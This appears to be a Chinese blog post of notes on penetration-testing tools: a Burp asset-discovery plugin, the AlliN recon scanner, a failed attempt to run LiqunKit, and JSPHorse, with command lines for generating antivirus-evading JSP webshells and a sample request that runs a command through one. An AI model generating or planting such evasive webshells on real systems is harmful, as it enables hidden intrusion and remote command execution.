整理一下这几天群里蹲到师傅们分享的工具
domain hunter pro这是一个bp的插件,只需使用br提供的代理访问网站就可以实现资产的自动挖掘功能,
还整合了一些右键快捷菜单,导出功能和一些工具
JSPHorse这个算是利用工具,用来生成jsp的免杀马的
生成标准形式基础Webshell
1java -jar JSPHorse.jar -p your_password生成蚁剑的免杀Webshell
1java -jar JSPHorse.jar -p your_password --ant全局Unicode编码(JSP支持全局Unicode编码)
1java -jar JSPHorse.jar -p your_password -u生成进阶版Webshell(Javac动态编译class)
1java -jar JSPHorse.jar -p your_password --super进阶版Webshell基础上全局Unicode编码
1java -jar JSPHorse.jar -p your_password --super -u使用ScriptEngine调用JS免杀
1java -jar JSPHorse.jar -p your_password --js使用ScriptEngine调用JS免杀基础上全局Unicode编码
1java -jar JSPHorse.jar -p your_password --js -u如何使用?
1.jsp?pwd=your_password&cmd=calc.exe
Allin一个辅助平常渗透测试项目或者攻防项目快速打点的综合工具
常用的参数记录一下,具体的直接-h就能看
1python AlliN.py --host "xxx.com" -m infoscan-m支持的参数有
infoscan 扫信息fscan用fofa配合-q参数,参数内容是fofa语法pscan 扫端口tscan扫标题,默认subscan子域名backscan后台oxid目标主机网卡LiqunKit这本来是一个漏洞利用的工具,但这个jar包不知为什么没跑起来,试了半天,看了issue有和我一样的问题,但我java版本也是1.8的,jar包名字也没修改过不知道为什么会不行,提个issue问下吧